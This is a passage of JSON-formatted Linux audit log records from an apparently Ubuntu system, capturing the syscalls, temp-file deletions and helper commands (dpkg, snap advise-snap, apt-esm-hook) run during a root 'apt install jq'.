"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.YkWrVY",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.373:363",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.ee5TIZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.373:364",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.0E0XyX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.377:365",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.HqcPS0",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.385:366",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.jclag1",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.389:367",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.O2Rj00",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.397:368",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.t4KBrX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.397:369",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.NDTHf1",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.405:370",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.bdbDUY",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.405:371",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.UwXwEZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.409:372",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.dGMtdZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.413:373",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.NVrbO0",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.417:374",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.LVyVwZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.417:375",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.Y1GUiX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.421:376",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.9QoqCX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.425:377",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7577,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c550ffe50",
"0x564c55035b10",
"0x564c5505baf0",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470474.781:378",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7578,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c1d66b70",
"0x7ffe41acd400",
"0x564c550c3c70",
"0x564c5502a62f"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470474.785:379",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7578,
"pid": 7579,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "snap",
"exe": "/usr/bin/snap",
"key": "software_mgmt",
"ARGV": [
"0x562804c75758",
"0x562804c757c0",
"0x562804c759b8",
"0x7f154226e850"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/snap",
"inode": 787492,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
],
"launch_time": 1632470474.781,
"ppid": 7575
}
}
{
"ID": "1632470474.793:380",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7578,
"pid": 7579,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "snap",
"exe": "/snap/snapd/12704/usr/bin/snap",
"key": "rootcmd",
"ARGV": [
"0xc00003fe00",
"0xc00023b060",
"0xc0001147e0",
"0x0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/snap/snapd/current/usr/bin/snap",
"inode": 99,
"dev": "07:02",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
],
"launch_time": 1632470474.781,
"ppid": 7575
}
}
{
"ID": "1632470474.809:381",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7587,
"pid": 7588,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c18eb5aa",
"0x7ffe41accdf0",
"0x7ffe41acdc68",
"0x8"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"sh",
"-c",
"[ ! -f /usr/lib/ubuntu-advantage/apt-esm-hook ] || /usr/lib/ubuntu-advantage/apt-esm-hook pre-invoke || true"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"sh",
"-c",
